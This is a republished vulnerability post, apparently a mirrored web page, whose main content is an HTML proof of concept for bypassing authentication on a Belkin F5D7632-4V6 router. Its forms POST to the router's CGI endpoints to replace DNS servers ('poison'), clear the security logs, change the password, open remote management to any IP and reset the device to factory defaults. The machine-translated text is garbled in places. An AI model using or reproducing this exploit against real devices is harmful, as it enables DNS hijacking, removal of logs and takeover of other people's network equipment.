Belkin wireless router Vulnerability

Source: Internet
Author: User
Tags dns poisoning


<Html>
<Head>
</Head>
<Body>
<B> This HTML code bypasses the webinterface password-protected Belkin wireless router + ADSL2 modem <br>
It works in F5D7632-4V6 with upgraded firmware 6.01.08 </B>
<Br>
<Form action = "http: // 192.168.2.1/cgi-bin/setup_dns.exe" name = dnspoison method = post>
Change the DNS domain name server (the IP address can be different) <br>
<Input name = page type = hidden value = "setup_dns">
<Input name = logout type = hidden value = "">
<Input name = auto_from_isp type = hidden value = "0">
<Input name = dns1_1 type = text value = "1">
<Input name = dns1_2 type = text value = "2">
<Input name = dns1_3 type = text value = "3">
<Input name = dns1_4 type = text value = "4">
<Br>
<Input name = dns2_1 type = text value = "1">
<Input name = dns2_2 type = text value = "2">
<Input name = dns2_3 type = text value = "3">
<Input name = dns2_4 type = text value = "5">
<Br>
<Input name = submit type = submit value = "poison">
</Form>
<Br>
<Br>
<Form action = "http: // 192.168.2.1/cgi-bin/statusprocess.exe" name = clearlog method = post>
Clear log files <br>
<Input name = securityclear type = submit value = "clear">
</Form>
<Br>
<Br>
<Form ACTION = "http: // 192.168.2.1/cgi-bin/system_all.exe" method = post name = changepassword>
Change the time, password (if you have an old password), remote management, and UPnP <br>
And automatic firmware update (good combination of DNS poisoning) <br>
<Input type = "hidden" name = "restart_time" value = "0">
<Input type = "hidden" name = "reload" value = "1">
<Input type = "hidden" name = "restart_page" value = document. location. href = "system. stm";>
<Input type = "hidden" name = "location_page" value = "system. stm">
<Input type = "hidden" name = "server1" value = ">
<Input type = "hidden" name = "server2" value = ">
<! -- For clock -->
<Input type = "hidden" name = "year" value = "">
<Input type = "hidden" name = "mon" value = "">
<Input type = "hidden" name = "day" value = "">
<Input type = "hidden" name = "hour" value = "">
<Input type = "hidden" name = "min" value = "">
<Input type = "hidden" name = "sec" value = "">
<Br> old password <br>
<Input type = "password" size = "12" maxlength = "12" name = "userOldPswd" value = "">
<Br> new password, twice <br>
<Input type = "password" size = "12" maxlength = "12" name = "userNewPswd" value = "">
<Input type = "password" size = "12" maxlength = "12" name = "userConPswd" value = "">
<Br> logon timeout (1-99 minutes) <br>
<Input type = "text" name = "timeout" size = "3" maxlength = "3" value = "10">
<Br> time and time zone: <br>
Xia Ling: <br>
<Input type = "checkbox" name = "daylight" value = "1"> time zone (number) <br>
<Input type = "text" name = "time_zone" value = "26">
<Input type = "checkbox" name = "enable_ntp" value = "1"> enable automatic time server maintenance <br>
<Tr>
<Td width = "240"> master server </td>
& Lt; td width = "360" & gt;
<Select name = "time1">
<Option> 132.163.4.102-North America </option>
<Option> 192.5.41.41-North America </option>
<Option> 192.5.41.209-North America </option>
<Option> 207.200.81.113-North America </option>
<Option> 208.184.49.9-North America </option>
<Option> 129.132.2.21-Europe </option>
<Option> 130.149.17.8-Europe </option>
<Option> 128.250.36.3-Australia </option>
<Option> 137.189.8.174-Asia Pacific </option>
</Select>
</Td>
</Tr>
<Tr>
<Td width = "240"> secondary server </td>
& Lt; td width = "360" & gt;
<Select name = "time2">
<Option> 132.163.4.102-North America </option>
<Option> 192.5.41.41-North America </option>
<Option> 192.5.41.209-North America </option>
<Option> 207.200.81.113-North America </option>
<Option> 208.184.49.9-North America </option>
<Option> 129.132.2.21-Europe </option>
<Option> 130.149.17.8-Europe </option>
<Option> 128.250.36.3-Australia </option>
<Option> 137.189.8.174-Asia Pacific </option>
</Select>
</Td>
</Tr>
<Br> Remote Management: <br>
<Input type = "checkbox" name = "allow_all" value = "1"> vrouters can be remotely managed by any IP address <br>
Vrouters can only be remotely managed using this IP address <br>
<Input name = "IP1" size = "3" maxlength = "3" value = "0">.
<Input name = "IP2" size = "3" maxlength = "3" value = "0">.
<Input name = "IP3" size = "3" maxlength = "3" value = "0">.
<Input name = "IP4" size = "3" maxlength = "3" value = "0">
<Br> remote Port:
<Input name = "REMOTEPORT" size = "5" maxlength = "5" value = "0">
<Br> NAT authorization: <br>
<Input type = radio name = Nat_enable value = 1> authorization <br>
<Input type = radio name = Nat_enable value = 0> abolish <br>
<Br> UPnP <br>
<Input type = "radio" name = "upnp_enable" value = 1> authorization <br>
<Input type = radio name = upnp_enable value = 0> abolish <br>
<Br> automatic firmware update <br>
<Input type = "radio" name = "autoUpdate_enable" value = 1> authorization <br>
<Input type = "radio" name = "autoUpdate_enable" value = 0> abolish <br>
</Form>
<Form method = "POST" action = "http: // 192.168.2.1/cgi-bin/restore.exe" name = "RebootForm">
<Br> restore factory default values (including passwords) <br>
<Input type = "hidden" name = "page" value = "tools_restore">
<Input type = "hidden" name = "logout">
<Input type = "submit" value = "Restore Default value" style = "{width: 120px;}" class = "submitBtn">
</Form>
</Body>
</Html>

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.